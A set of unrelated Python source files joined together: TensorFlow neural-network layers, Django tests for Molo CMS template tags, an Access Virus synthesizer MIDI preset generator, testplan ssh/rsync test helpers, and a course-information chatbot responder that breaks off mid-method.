def call(self, x, training=None):
while True:
with tf.name_scope(self.scope):
try:
demix = tf.tensordot(x, self.w, axes=[[self.axis], [0]],
name='dmx')
demix = self.nonlin(demix + self.b_in)
#print(self.scope, ": output :", demix.shape)
return demix
except(AttributeError):
input_shape = x.shape
self.build(input_shape)
#print(self.scope, 'building from call')
class LFTConv(BaseLayer):
"""
Stackable temporal convolutional layer, interpreatble (LF)
"""
def __init__(self, scope="tconv", size=32, nonlin=tf.nn.relu,
filter_length=7, pooling=2, padding='SAME', specs={},
**args):
self.scope = scope
super(LFTConv, self).__init__(size=size, nonlin=nonlin, specs=specs,
**args)
self.size = size
self.filter_length = filter_length
self.padding = padding
def get_config(self):
config = super(LFTConv, self).get_config()
config.update({'scope': self.scope,
'filter_length': self.filter_length,
'nonlin': self.nonlin, 'padding': self.padding})
return config
def build(self, input_shape):
super(LFTConv, self).build(input_shape)
self.constraint = self._set_constraints()
self.reg = self._set_regularizer()
shape = [1, self.filter_length, input_shape[-1], 1]
self.filters = self.add_weight(shape=shape,
initializer='he_uniform',
regularizer=self.reg,
constraint=self.constraint,
trainable=True,
name='tconv_weights',
dtype=tf.float32)
self.b = self.add_weight(shape=([input_shape[-1]]),
initializer=Constant(0.1),
regularizer=None,
trainable=True,
name='bias',
dtype=tf.float32)
print("Built: {} input: {}".format(self.scope, input_shape))
#@tf.function
def call(self, x, training=None):
while True:
with tf.name_scope(self.scope):
try:
conv = tf.nn.depthwise_conv2d(x,
self.filters,
padding=self.padding,
strides=[1, 1, 1, 1],
data_format='NHWC')
conv = self.nonlin(conv + self.b)
#print(self.scope, ": output :", conv.shape)
return conv
except(AttributeError):
input_shape = x.shape
self.build(input_shape)
class VARConv(BaseLayer):
"""
Stackable temporal convolutional layer, interpreatble (LF)
"""
def __init__(self, scope="tconv", size=32, nonlin=tf.nn.relu,
filter_length=7, pooling=2, padding='SAME', specs={},
**args):
self.scope = scope
super(VARConv, self).__init__(size=size, nonlin=nonlin, specs=specs,
**args)
self.size = size
self.filter_length = filter_length
self.padding = padding
def get_config(self):
config = super(VARConv, self).get_config()
config.update({'scope': self.scope,
'filter_length': self.filter_length,
'nonlin': self.nonlin, 'padding': self.padding})
return config
def build(self, input_shape):
print("input_shape:", input_shape)
super(VARConv, self).build(input_shape)
self.constraint = self._set_constraints()
self.reg = self._set_regularizer()
shape = [1, self.filter_length, input_shape[-1], self.size]
self.filters = self.add_weight(shape=shape,
initializer='he_uniform',
regularizer=self.reg,
constraint=self.constraint,
trainable=True,
name='tconv_weights',
dtype=tf.float32)
self.b = self.add_weight(shape=([input_shape[-1]]),
initializer=Constant(0.1),
regularizer=None,
trainable=True,
name='bias',
dtype=tf.float32)
print("Built: {} input: {}".format(self.scope, input_shape))
#@tf.function
def call(self, x, training=None):
while True:
with tf.name_scope(self.scope):
try:
conv = tf.nn.conv2d(x, self.filters,
padding=self.padding,
strides=[1, 1, 1, 1],
data_format='NHWC')
conv = self.nonlin(conv + self.b)
conv = self.nonlin(conv + self.b)
#print(self.scope, ": output :", conv.shape)
return conv
except(AttributeError):
input_shape = x.shape
self.build(input_shape)
#print(self.scope, 'building from call')
class TempPooling(BaseLayer):
def __init__(self, scope="pool", stride=2, pooling=2, specs={},
padding='SAME', pool_type='max', **args):
self.scope = '_'.join([pool_type, scope])
super(TempPooling, self).__init__(size=None, nonlin=None, specs=specs,
**args)
self.strides = [1, 1, stride, 1]
self.kernel = [1, 1, pooling, 1]
self.padding = padding
self.pool_type = pool_type
#@tf.function
def call(self, x):
if self.pool_type == 'avg':
pooled = tf.nn.avg_pool2d(
x,
ksize=self.kernel,
strides=self.strides,
padding=self.padding,
data_format='NHWC')
else:
pooled = tf.nn.max_pool2d(
x,
ksize=self.kernel,
strides=self.strides,
padding=self.padding,
data_format='NHWC')
#print(self.scope, ": output :", pooled.shape)
return pooled
def build(self, input_shape):
super(TempPooling, self).build(input_shape)
self.built = True
def get_config(self):
config = super(TempPooling, self).get_config()
config.update({'scope': self.scope,
'pool_type': self.pool_type,
'stride': self.strides, 'pooling': self.pooling,
'padding': self.padding})
return config
#def compose(f, g):
# return lambda *a, **kw: f(g(*a, **kw))
#
#
#def stack_layers(*args):
# return functools.partial(functools.reduce, compose)(*args)
#
#
#def vgg_block(n_layers, layer, kwargs):
# layers = []
# for i in range(n_layers):
# if i > 0:
# kwargs['inch'] = kwargs['n_ls']
# layers.append(layer(**kwargs))
# layers.append(tf.layers.batch_normalization)
# layers.append(tf.nn.max_pool)
# return stack_layers(layers[::-1])
#def weight_variable(shape, name='', method='he'):
# """Initialize weight variable."""
# if method == 'xavier':
# xavf = 2./sum(np.prod(shape[:-1]))
# initial = xavf*tf.random_uniform(shape, minval=-.5, maxval=.5)
#
# elif method == 'he':
# hef = np.sqrt(6. / np.prod(shape[:-1]))
# initial = hef*tf.random_uniform(shape, minval=-1., maxval=1.)
#
# else:
# initial = tf.truncated_normal(shape, stddev=.1)
#
# return tf.Variable(initial, trainable=True, name=name+'weights')
#
#
#def bias_variable(shape):
# """Initialize bias variable as constant 0.1."""
# initial = tf.constant(0.1, shape=shape)
# return tf.Variable(initial, trainable=True, name='bias')
#
#
#def spatial_dropout(x, rate, seed=1234):
# num_feature_maps = [tf.shape(x)[0], tf.shape(x)[3]]
# random_tensor = 1 - rate
# random_tensor = random_tensor + tf.random_uniform(num_feature_maps,
# seed=seed,
# dtype=x.dtype)
# binary_tensor = tf.floor(random_tensor)
# binary_tensor = tf.reshape(binary_tensor, [-1, 1, 1, tf.shape(x)[3]])
# ret = tf.div(x, (1 - rate)) * binary_tensor
# return ret
#class DeMixing():
# """Reduce dimensions across one domain."""
# def __init__(self, scope="de-mix", n_ls=32, nonlin=tf.identity, axis=3):
# self.scope = scope
# self.size = n_ls
# self.nonlin = nonlin
# self.axis = axis
#
# def __call__(self, x):
# with tf.name_scope(self.scope):
# while True:
# # reuse weights if already initialized
# try:
# x_reduced = self.nonlin(
# tf.tensordot(x, self.W, axes=[[self.axis], [0]],
# name='de-mix')
# + self.b_in)
# print('dmx', x_reduced.shape)
# return x_reduced
# except(AttributeError):
# self.W = weight_variable(
# (x.shape[self.axis].value, self.size), name='dmx_')
# self.b_in = bias_variable([self.size])
# print(self.scope, 'init : OK')
#class ConvDSV():
# """Standard/Depthwise/Spearable Convolutional Layer constructor."""
#
# def __init__(self, scope="conv", n_ls=None, nonlin=None, inch=None,
# domain=None, padding='SAME', filter_length=5, stride=1,
# pooling=2, dropout=.5, conv_type='depthwise'):
#
# self.scope = '-'.join([conv_type, scope, domain])
# self.padding = padding
# self.domain = domain
# self.inch = inch
# self.dropout = dropout
# self.size = n_ls
# self.filter_length = filter_length
# self.stride = stride
# self.nonlin = nonlin
# self.conv_type = conv_type
#
# def __call__(self, x):
# """Calculate the graph for input `X`.
#
# Raises:
# -------
# ValueError: If the convolution/domain arguments do not have
# the supported values.
# """
# with tf.name_scope(self.scope):
# while True:
# try:
# if self.conv_type == 'depthwise':
# conv_ = tf.nn.depthwise_conv2d(
# x,
# self.filters,
# strides=[1, self.stride, 1, 1],
# padding=self.padding)
#
# elif self.conv_type == 'separable':
# conv_ = tf.nn.separable_conv2d(
# x,
# self.filters,
# self.pwf,
# strides=[1, self.stride, 1, 1],
# padding=self.padding)
#
# elif self.conv_type == '2d':
# conv_ = tf.nn.conv2d(
# x,
# self.filters,
# strides=[1, self.stride, self.stride, 1],
# padding=self.padding)
# else:
# raise ValueError('Invalid convolution type.')
#
# conv_ = self.nonlin(conv_ + self.b)
#
# return conv_
#
# except(AttributeError):
# if self.domain == 'time':
# w_sh = [1, self.filter_length, self.inch, self.size]
#
# elif self.domain == 'space':
# w_sh = [self.filter_length, 1, self.inch, self.size]
#
# elif self.domain == '2d':
# w_sh = [self.filter_length[0], self.filter_length[1],
# self.inch, self.size]
# else:
# raise ValueError('Invalid domain.')
#
# self.filters = weight_variable(w_sh, name='weights')
# self.b = bias_variable([self.size])
#
# if self.conv_type == 'separable':
# self.pwf = weight_variable(
# [1, 1, self.inch*self.size, self.size],
# name='sep-pwf')
#
# print(self.scope, 'init : OK')
|
# coding=utf-8
import pytest
from mock import patch
from django.utils import timezone
from django.test import TestCase, RequestFactory
from molo.core.models import (
Main, SiteLanguageRelation, Languages, BannerPage,
SiteSettings, ArticleOrderingChoices, LanguageRelation,
FormPage, FormIndexPage
)
from molo.core.tests.base import MoloTestCaseMixin
from molo.core.templatetags.core_tags import (
get_parent, bannerpages, get_recommended_articles,
hero_article, render_translations, load_descendant_articles_for_section,
load_child_articles_for_section,
load_sections, latest_form_listing
)
@pytest.mark.django_db
class TestModels(TestCase, MoloTestCaseMixin):
def setUp(self):
self.mk_main()
self.main = Main.objects.all().first()
self.factory = RequestFactory()
self.language_setting = Languages.objects.create(
site_id=self.main.get_site().pk)
self.english = SiteLanguageRelation.objects.create(
language_setting=self.language_setting,
locale='en',
is_active=True)
self.french = SiteLanguageRelation.objects.create(
language_setting=self.language_setting,
locale='fr',
is_active=True)
self.yourmind = self.mk_section(
self.section_index, title='Your mind')
self.yourmind_sub = self.mk_section(
self.yourmind, title='Your mind subsection')
# create a requset object
self.factory = RequestFactory()
self.request = self.factory.get('/')
self.request.site = self.site
def test_render_translations(self):
# this should return an empty dictionary for non main lang pages
article = self.mk_articles(self.yourmind, 1)[0]
fr_article = self.mk_article_translation(article, self.french)
self.assertEqual(render_translations({}, fr_article), {})
def test_bannerpages_without_position(self):
banner = BannerPage(title='test banner')
self.banner_index.add_child(instance=banner)
banner.save_revision().publish()
banner2 = BannerPage(title='test banner 2')
self.banner_index.add_child(instance=banner2)
banner2.save_revision().publish()
banner3 = BannerPage(title='test banner 3')
self.banner_index.add_child(instance=banner3)
banner3.save_revision().publish()
self.assertEqual(self.main.bannerpages().count(), 3)
request = self.factory.get('/')
request.site = self.site
self.assertEqual(len(bannerpages({
'locale_code': 'en', 'request': request})['bannerpages']), 3)
def test_bannerpages_with_position(self):
banner = BannerPage(title='test banner')
self.banner_index.add_child(instance=banner)
banner.save_revision().publish()
banner2 = BannerPage(title='test banner 2')
self.banner_index.add_child(instance=banner2)
banner2.save_revision().publish()
banner3 = BannerPage(title='test banner 3')
self.banner_index.add_child(instance=banner3)
banner3.save_revision().publish()
self.assertEqual(self.main.bannerpages().count(), 3)
request = self.factory.get('/')
request.site = self.site
self.assertEqual(len(bannerpages({
'locale_code': 'en',
'request': request}, position=0)['bannerpages']), 1)
self.assertEqual(bannerpages({
'locale_code': 'en',
'request': request}, position=0)['bannerpages'][0].title,
'test banner')
self.assertEqual(bannerpages({
'locale_code': 'en',
'request': request}, position=1)['bannerpages'][0].title,
'test banner 2')
def test_bannerpages_with_position_out_of_range(self):
banner = BannerPage(title='test banner')
self.banner_index.add_child(instance=banner)
banner.save_revision().publish()
banner2 = BannerPage(title='test banner 2')
self.banner_index.add_child(instance=banner2)
banner2.save_revision().publish()
banner3 = BannerPage(title='test banner 3')
self.banner_index.add_child(instance=banner3)
banner3.save_revision().publish()
self.assertEqual(self.main.bannerpages().count(), 3)
request = self.factory.get('/')
request.site = self.site
self.assertEqual(bannerpages({
'locale_code': 'en',
'request': request}, position=4), None)
def test_get_parent_template_tag(self):
request = self.factory.get('/')
request.site = self.site
article = self.mk_articles(self.yourmind, 1)[0]
fr_article = self.mk_article_translation(article, self.french)
self.assertEqual(
get_parent({'locale_code': 'fr', 'request': request}, article),
self.yourmind)
self.assertEqual(
get_parent({'locale_code': 'fr', 'request': request}, fr_article),
self.yourmind)
self.assertEqual(get_parent(
{'locale_code': 'fr', 'request': request}, self.yourmind_sub),
self.yourmind)
fr_yourmind = self.mk_section_translation(self.yourmind, self.french)
self.assertEqual(
get_parent({'locale_code': 'en', 'request': request}, article),
self.yourmind)
self.assertEqual(
get_parent({'locale_code': 'en', 'request': request}, fr_article),
self.yourmind)
self.assertEqual(get_parent(
{'locale_code': 'en', 'request': request}, self.yourmind_sub),
self.yourmind)
self.assertEqual(
get_parent({'locale_code': 'fr', 'request': request}, article),
fr_yourmind)
self.assertEqual(
get_parent({'locale_code': 'fr', 'request': request}, fr_article),
fr_yourmind)
self.assertEqual(get_parent(
{'locale_code': 'fr', 'request': request}, self.yourmind_sub),
fr_yourmind)
self.assertEqual(get_parent(
{'locale_code': 'fr', 'request': request}, self.yourmind),
None)
def test_article_ordering_descendant_articles(self):
today = timezone.now()
request = self.factory.get('/')
request.site = self.site
settings = SiteSettings.objects.create(
site=self.site,
article_ordering_within_section=ArticleOrderingChoices.PK
)
article1 = self.mk_article(
self.yourmind, title='article 1',
first_published_at=today - timezone.timedelta(hours=1),
featured_in_section_start_date=today - timezone.timedelta(hours=1)
)
article2 = self.mk_article(
self.yourmind, title='article 2',
first_published_at=today,
featured_in_section_start_date=today
)
self.assertEqual(load_descendant_articles_for_section({
'locale_code': 'en', 'request': request
}, self.yourmind)[0], article1)
self.assertEqual(load_descendant_articles_for_section({
'locale_code': 'en', 'request': request
}, self.yourmind)[1], article2)
settings.article_ordering_within_section =\
ArticleOrderingChoices.PK_DESC
settings.save()
self.assertEqual(load_descendant_articles_for_section({
'locale_code': 'en', 'request': request
}, self.yourmind)[0], article2)
self.assertEqual(load_descendant_articles_for_section({
'locale_code': 'en', 'request': request
}, self.yourmind)[1], article1)
def test_article_ordering_child_articles(self):
today = timezone.now()
request = self.factory.get('/')
request.site = self.site
settings = SiteSettings.objects.create(
site=self.site,
article_ordering_within_section=ArticleOrderingChoices.PK
)
article1 = self.mk_article(self.yourmind, title='article 1')
article1.first_published_at = today + timezone.timedelta(hours=1)
article1.save()
article2 = self.mk_article(self.yourmind, title='article 2')
article2.first_published_at = today - timezone.timedelta(hours=1)
article2.save()
self.assertEqual(load_child_articles_for_section({
'locale_code': 'en', 'request': request
}, self.yourmind)[0], article1)
self.assertEqual(load_child_articles_for_section({
'locale_code': 'en', 'request': request
}, self.yourmind)[1], article2)
settings.article_ordering_within_section =\
ArticleOrderingChoices.PK_DESC
settings.save()
self.assertEqual(load_child_articles_for_section({
'locale_code': 'en', 'request': request
}, self.yourmind)[0], article2)
self.assertEqual(load_child_articles_for_section({
'locale_code': 'en', 'request': request
}, self.yourmind)[1], article1)
def test_get_recommended_articles(self):
request = self.factory.get('/')
request.site = self.site
article1 = self.mk_article(self.yourmind, title='article 1')
self.assertEqual(get_recommended_articles(
{'locale_code': 'en', 'request': request}, article1),
[])
@patch('molo.core.templatetags.core_tags.get_pages')
def test_hero_article_empty_queryset_if_no_site(self, get_pages_mock):
request = self.factory.get('/')
request.site = None
context = {'request': request, 'locale_code': 'en'}
get_pages_mock.return_value = []
self.assertEqual(
hero_article(context),
{
'articles': [],
'request': request,
'locale_code': 'en',
}
)
def test_load_sections(self):
request = self.factory.get('/')
request.site = self.site
context = {'locale_code': 'en', 'request': request}
your_body = self.mk_section(
self.section_index, title='Your body')
service = self.mk_section(
self.section_index,
title='Service dir', is_service_aggregator=True)
self.assertTrue(service not in load_sections(context))
self.assertTrue(service in load_sections(
context, service_aggregator=True))
self.assertTrue(your_body in load_sections(context))
self.assertTrue(your_body not in load_sections(
context, service_aggregator=True))
class TestFormTemplateTags(TestCase, MoloTestCaseMixin):
def setUp(self):
self.mk_main()
self.main = Main.objects.all().first()
self.language_setting = Languages.objects.create(
site_id=self.main.get_site().pk)
self.english = SiteLanguageRelation.objects.create(
language_setting=self.language_setting,
locale='en', is_active=True)
LanguageRelation.objects.create(
page=self.main, language=self.english)
self.yourmind = self.mk_section(
self.section_index, title='Your mind')
self.yourmind_sub = self.mk_section(
self.yourmind, title='Your mind subsection')
self.form_index, created = FormIndexPage.\
objects.get_or_create(title='Forms', slug='form-pages')
if created:
self.main.add_child(instance=self.form_index)
self.form_index.save_revision().publish()
for i in range(1, 5):
kw = {
'title': 'test form {}'.format(i)}
form = 'form{}'.format(i)
setattr(self, form, FormPage(**kw))
self.form_index.add_child(instance=getattr(self, form))
self.form_index.save_revision().publish()
def test_latest_form_listing(self):
limit = 2
res = latest_form_listing(limit)
self.assertEqual(len(res['forms']), limit)
self.assertEqual(res['forms'][0].title, 'test form 4')
self.assertEqual(res['forms'][1].title, 'test form 3')
|
"""
we can inspect the factory installed presets for the access virus
by reading its MIDI sysex dumps.
these messages are formatted: (0, 32, 51, 1, dd, 16, bb, ss, [256 ints], cs)
where dd is the device id, bb is bank, ss is program number, and cs is checksum
we can also use this same fromat to write parameters to the working preset
for more info see page 255 of the virus B manual: https://www.virus.info/downloads
"""
from mido import Message
import numpy as np
from numpy import ndarray
import pandas as pd
from pandas import DataFrame
import random
from typing import Callable, List, Optional, Dict
VIRUS_SYSEX_HEADER = [0, 32, 51, 1, 0, 16, 0, 127]
VIRUS_SYSEX_CHECKSUM = [0] # this value seems to be ignored on write
def parse_virus_preset_dump(msg: Message) -> List[int]:
"""
strips sysex header and checksum bits to return list of preset patches
"""
data = list(msg.data[len(VIRUS_SYSEX_HEADER): -len(VIRUS_SYSEX_CHECKSUM)])
assert len(data) == 256
return data
def create_virus_patch_msg(params: list) -> Message:
"""
takes a list of 256 parameter values and creates a Mido sysex message
to update the virus
"""
assert len(params) == 256, params
data = VIRUS_SYSEX_HEADER + params + VIRUS_SYSEX_CHECKSUM
return Message('sysex', data=data)
class VirusPresetGenerator:
DefaultOverrideParams = {
64: 0, # hold pedal
91: 127, # patch volume
93: 65, # transpose
105: 0, # chorus mix
108: 0, # chorus delay
112: 0, # delay / reverb mode
113: 0, # effect send
241: 33, # title string, val 33 = "!"
242: 33, # title string, val 33 = "!"
243: 33, # title string, val 33 = "!"
244: 33, # title string, val 33 = "!"
245: 33, # title string, val 33 = "!"
246: 33, # title string, val 33 = "!"
247: 33, # title string, val 33 = "!"
248: 33, # title string, val 33 = "!"
249: 33, # title string, val 33 = "!"
250: 33, # title string, val 33 = "!"
}
def __init__(
self,
preset_path: Optional[str] = None,
preset_data: Optional[DataFrame] = None,
uniq_val_thresh: int = 10,
override_params: Optional[Dict[int, int]] = None,
):
"""
either a path to a csv file or a dataframe must be passed in
:arg preset_path:
:arg preset_data:
:arg uniq_val_thresh: min number of unique values observed for a given
parameter to use a triangular distribution. if fewer unique
values are observed, use categorical distribution
:arg override_params: optional map indicating which parameters
should be set to default values
"""
if preset_data is None:
assert preset_path is not None
preset_data = self.load_presets_from_csv(preset_path)
self.preset_data = preset_data
self.distributions = self.create_distributions(preset_data, uniq_val_thresh)
self.override_params = self.DefaultOverrideParams if override_params is None else override_params # noqa
self.override_distributions()
def override_distributions(self) -> None:
"""
modifies previously created distributions s.t. overridden
parameters return the proper default value
"""
for idx, val in self.override_params.items():
def f(v=val):
return v
self.distributions[idx] = f
def load_presets_from_csv(self, preset_path: str) -> DataFrame:
df = pd.read_csv(preset_path)
df.columns = map(int, df.columns)
return df
@staticmethod
def _create_categorical_probs(
preset_vals: ndarray,
min_val: int,
max_val: int,
) -> ndarray:
"""
returns an array x s.t. x[i] is the probability of i occuring in preset_vals
:arg preset_vals: observed values whose probability density we want to model
:arg min_val: smallest possible value
:arg max_val: largest possible value
"""
counts = dict(zip(*np.unique(preset_vals, return_counts=True)))
count_array = np.array([counts.get(i, 0) for i in range(min_val, max_val+1)])
return count_array / count_array.sum()
@staticmethod
def _create_categorical_dist(
preset_vals: ndarray,
min_val: int = 0,
max_val: int = 127,
) -> Callable[[], int]:
"""
a large number of Virus parameter values are either categorical
(eg LFO shape) or have an unusual distribution in the factory
preset patches. for these parameters, we want to sample from the
observed probabilites of each value in the factory presets
:arg preset_vals: parameter values observed in factory presets. this is the distribution
we'd like to model.
:arg min_val: smallest possible value
:arg max_val: largest possible value
"""
values = np.arange(min_val, max_val+1)
probs = VirusPresetGenerator._create_categorical_probs(
preset_vals, min_val=min_val, max_val=max_val)
def f():
return np.random.choice(values, 1, p=probs)[0]
return f
@staticmethod
def _create_triangular_dist(
preset_vals: ndarray,
min_val: int = 0,
max_val: int = 127,
) -> Callable[[], int]:
"""
instead of using a uniform distribution for [0, 127], we'll use a
triangular distribution to account for the fact that some presets
will have mode that isn't centered
:arg preset_vals: parameter values observed in factory presets. this is the distribution
we'd like to model.
:arg min_val: smallest possible value
:arg max_val: largest possible value
"""
def f():
return int(np.round(np.random.triangular(0, preset_vals.mean(), 127)))
return f
def create_distributions(
self,
preset_data: DataFrame,
uniq_val_thresh: int = 10
) -> List[Callable[[], int]]:
"""
creates a map that maps the index of a virus synth parameter to
a method that can be used to sample a new value based on that
parameter's distribution of values in the factory presets
if a particular paramter has fewer than `uniq_val_thresh` values
in the 256 factory presets, we assume this to be a categorical
param, eg LFO shape. for these parameters, we want to only
sample values observed in the factory presets.
"""
distributions = []
for i in preset_data.columns:
preset_vals = preset_data[i].to_numpy()
if len(preset_data[i].unique()) < uniq_val_thresh:
distributions.append(self._create_categorical_dist(preset_vals))
else:
distributions.append(self._create_triangular_dist(preset_vals))
return distributions
def generate_patch(self) -> List[int]:
return [d() for d in self.distributions]
def generate_patch_from_seed(self, seed_id: int, n_diff_params: int = 25):
"""
creates a new patch based on a stored preset.
:arg seed_id: id of saved preset (max 255)
:arg n_diff_params: number of params to randomly vary
"""
assert seed_id < self.preset_data.shape[0]
data = list(self.preset_data.loc[seed_id])
n_total_params = self.preset_data.shape[1]
valid_params = set(range(n_total_params)).difference(set(self.override_params.keys()))
params_to_change = random.sample(valid_params, n_rand_params)
for param_id in params_to_change:
data[param_id] = self.distributions[param_id]()
for param_id, val in self.overrides.items():
data[param_id] = val
return data
|
import subprocess
from testplan.common.utils.remote import copy_cmd
def mock_ssh(host, command):
"""Avoid network connection."""
return ["/bin/sh", "-c", command]
def strip_host(source, target, **kwargs):
"""Avoid network connection."""
if ":" in source:
source = source.split(":")[1]
if ":" in target:
target = target.split(":")[1]
return copy_cmd(source, target)
def copytree(src, dst):
"""
We can't use shutil.copytree() with python 3.4.4 due to
https://bugs.python.org/issue21697 so use rsync instead.
"""
subprocess.check_call(
[
"rsync",
"-rL",
"--exclude=.git",
"--exclude=*.pyc",
"--exclude=*__pycache__*",
src,
dst,
]
)
|
from xuepy.client.api.interaction import Interaction
|
"""This class is responsible for dealing with the content of a users message and generating responses."""
from model import Model
from datastore import Course, Section
from typing import List, Set
from queryspec import Intent, QueryParameters, MissingFieldException
'''Takes in a message from the user, and uses its model to create a response message'''
class InvalidCourseException(Exception):
pass
class Responder():
def __init__(self, args, datastore, iohandler):
self.args = args
self.datastore = datastore
self.iohandler = iohandler
self.model = Model(args, datastore, iohandler)
self.intent_to_handler = {
Intent.UNKNOWN : self.handler_unknown,
Intent.PREREQS_OF_COURSE : self.handler_prereqs_of_course,
Intent.UNITS_OF_COURSE : self.handler_units_of_course,
Intent.COURSE_OFFERED_IN_TERM : self.handler_course_offered_in_term,
Intent.TERMS_COURSE_OFFERED : self.handler_terms_course_offered,
Intent.NUMBER_OF_TERMS_COURSE_OFFERED : self.handler_number_of_terms_course_offered,
Intent.DOES_COURSE_INVOLVE_CODING : self.handler_does_course_involve_coding,
Intent.WHAT_COURSES_INVOLVE_CODING : self.handler_what_courses_involve_coding,
Intent.TEACHERS_OF_COURSE_CURRENT : self.handler_teachers_of_course_current,
Intent.PROFESSOR_COURSES_CURRENT : self.handler_professor_courses_current,
Intent.TEACHERS_OF_COURSE_NEXT : self.handler_teachers_of_course_next,
Intent.PROFESSOR_COURSES_NEXT : self.handler_professor_courses_next,
Intent.IS_COURSE_ELECTIVE : self.handler_is_course_elective,
Intent.ELECTIVES_OFFERED_CURRENT : self.handler_electives_offered_current,
Intent.ELECTIVES_OFFERED_NEXT : self.handler_electives_offered_next,
Intent.DESCRIPTION_OF_COURSE : self.handler_description_of_course,
Intent.FIND_COURSE_ABOUT_TOPIC : self.handler_find_course_about_topic,
Intent.TIMES_COURSE_OFFERED_CURRENT : self.handler_times_course_offered_current,
Intent.TIMES_COURSE_OFFERED_NEXT : self.handler_times_course_offered_next,
Intent.HOURS_OF_COURSE : self.handler_hours_of_course,
Intent.TITLE_OF_COURSE : self.handler_title_of_course,
Intent.COURSE_ID_OF_COURSE : self.handler_course_id_of_course,
Intent.LEVEL_OF_COURSE : self.handler_level_of_course,
Intent.ENROLLMENT_CAP_OF_COURSE_CURRENT : self.handler_enrollment_cap_of_course_current,
Intent.ENROLLMENT_CAP_OF_COURSE_NEXT : self.handler_enrollment_cap_of_course_next,
}
def get_response(self, message: str) -> str:
'''The primary function of the Responder. Takes in a raw message from the user
and returns a final response message'''
intent, params = self.model.get_intent_and_params(message)
if self.args.verbose:
print(f"intent={intent.name}, params={params}")
try:
return self.intent_to_handler[intent](params)
except MissingFieldException as e:
return self.missing_information_response(intent, params, str(e))
except InvalidCourseException as e:
return self.invalid_course_message(str(e))
except KeyboardInterrupt as e:
raise e
except Exception as e:
if self.args.dev_mode:
raise e
else:
return self.get_error_message()
# Query handlers
def handler_unknown(self, params: QueryParameters) -> str:
'''This one is special, it should use any params available to craft the best reponse it can'''
return "unknown intent" #placeholder
#Use this as a model for implementing the rest
def handler_prereqs_of_course(self, params: QueryParameters) -> str:
# Require the presence of variable for a given intent, this corresponds to the [variable] in the query
params.require_class_id()
# Retrieve the course object via self.get_course() this handles the case of an invalid course automatically
course = self.get_course(params.class_id)
#Special case response since prereqs could be None
if course.prereqs is None:
return f"{course.full_name()} has no prerequisite courses."
#prefer to use course.full_name() as opposed to course.title
return f"The prerequisites for {course.full_name()} are: {course.prereqs}"
def handler_units_of_course(self, params: QueryParameters) -> str:
params.require_class_id()
course = self.get_course(params.class_id)
return f"{course.full_name()} counts for {course.units} units."
def handler_course_offered_in_term(self, params: QueryParameters) -> str:
params.require_class_id()
params.require_term()
course = self.get_course(params.class_id)
if params.term in course.terms:
return f"Yes, STAT {params.class_id} is offered in the {params.term.title()}."
else:
return f"Sorry, STAT {params.class_id} is not offered in the {params.term.title()}."
def handler_terms_course_offered(self, params: QueryParameters) -> str:
params.require_class_id()
course = self.get_course(params.class_id)
if len(course.terms) == 0:
return f"Sorry, {course.full_name()} is not a regularly offered class."
if len(course.terms) == 1:
return f"{course.full_name()} is typically offered in the {', '.join([t.title() for t in course.terms])}."
else:
return f"{course.full_name()} is typically offered in the following quarters: {', '.join([t.title() for t in course.terms])}."
def handler_number_of_terms_course_offered(self, params: QueryParameters) -> str:
params.require_class_id()
course = self.get_course(params.class_id)
numberOfTerms = len(course.terms)
if numberOfTerms == 1:
return f"{course.full_name()} is usually offered in {numberOfTerms} quarter."
else:
return f"{course.full_name()} is usually offered in {numberOfTerms} quarters."
def handler_does_course_involve_coding(self, params: QueryParameters) -> str:
params.require_class_id()
course = self.get_course(params.class_id)
if course.coding_involved:
return f"Yes, {course.full_name()} involves coding."
else:
return f"No, {course.full_name()} does not involve coding."
def handler_what_courses_involve_coding(self, params: QueryParameters) -> str:
classes = self.datastore.get_classes_with_coding()
classes = ["STAT " + str(c) for c in classes]
if len(classes) > 1:
classes[-1] = "and " + str(classes[-1])
return f"{', '.join(classes)} require coding."
def handler_teachers_of_course_current(self, params: QueryParameters) -> str:
params.require_class_id()
sections = self.datastore.get_sections_from_id_and_quarter(params.class_id, True)
if len(sections) == 0:
return f"Sorry, there are no sections of STAT {params.class_id} this quarter."
professors = set()
# Correct formatting and no duplicates
for section in sections:
name = section.teacher.split(", ")[0].title()
professors.add(name)
professors = list(professors)
if len(professors) > 1:
professors[-1] = "and " + professors[-1]
# Can have 0, 1, or multiple professors teaching a class
if len(professors) == 1:
return f"Professor {', '.join(professors)} is teaching {sections[0].full_name()} this quarter."
elif len(professors) == 0:
return f"Sorry, no one is teaching STAT {params.class_id} this quarter."
else:
return f"Professors {', '.join(professors)} are teaching {sections[0].full_name()} this quarter."
def handler_professor_courses_current(self, params: QueryParameters) -> str:
params.require_professor()
sections = self.datastore.get_sections_from_professor(params.professor, True)
if len(sections) == 0:
return f"Sorry, {params.professor} is not teaching any courses this quarter."
classes = set()
# Correct formatting and no duplicates
for section in sections:
name = section.full_name()
classes.add(name)
classes = list(classes)
if len(classes) > 2:
classes[-1] = "and " + str(classes[-1])
if len(classes) == 0:
return f"Sorry, Professor {params.professor.title()} is not teaching any classes this quarter."
elif len(classes) == 2:
return f"Professor {params.professor.title()} is teaching {classes[0] + ' and ' + classes[1]} this quarter."
else:
return f"Professor {params.professor.title()} is teaching {', '.join(classes)} this quarter."
def handler_teachers_of_course_next(self, params: QueryParameters) -> str:
params.require_class_id()
sections = self.datastore.get_sections_from_id_and_quarter(params.class_id, False)
if len(sections) == 0:
return f"Sorry, there are no sections of STAT {params.class_id} next quarter."
professors = set()
# Correct formatting and no duplicates
for section in sections:
name = section.teacher.split(", ")[0].title()
professors.add(name)
professors = list(professors)
if len(professors) > 1:
professors[-1] = "and " + professors[-1]
# Can have 0, 1, or multiple professors teaching a class
if len(professors) == 1:
return f"Professor {', '.join(professors)} is teaching {sections[0].full_name()} next quarter."
elif len(professors) == 0:
return f"Sorry, no one is teaching STAT {params.class_id} next quarter."
else:
return f"Professors {', '.join(professors)} are teaching {sections[0].full_name()} next quarter."
def handler_professor_courses_next(self, params: QueryParameters) -> str:
params.require_professor()
sections = self.datastore.get_sections_from_professor(params.professor, False)
if len(sections) == 0:
return f"Sorry, {params.professor} is not teaching any courses next quarter."
classes = set()
# Correct formatting and no duplicates
for section in sections:
name = section.full_name()
classes.add(name)
classes = list(classes)
if len(classes) > 2:
classes[-1] = "and " + str(classes[-1])
if len(classes) == 0:
return f"Sorry, Professor {params.professor.title()} is not teaching any classes next quarter."
elif len(classes) == 2:
return f"Professor {params.professor.title()} is teaching {classes[0] + ' and ' + classes[1]} next quarter."
else:
return f"Professor {params.professor.title()} is teaching {', '.join(classes)} next quarter."
def handler_is_course_elective(self, params: QueryParameters) -> str:
params.require_class_id()
course = self.get_course(params.class_id)
if course.elective:
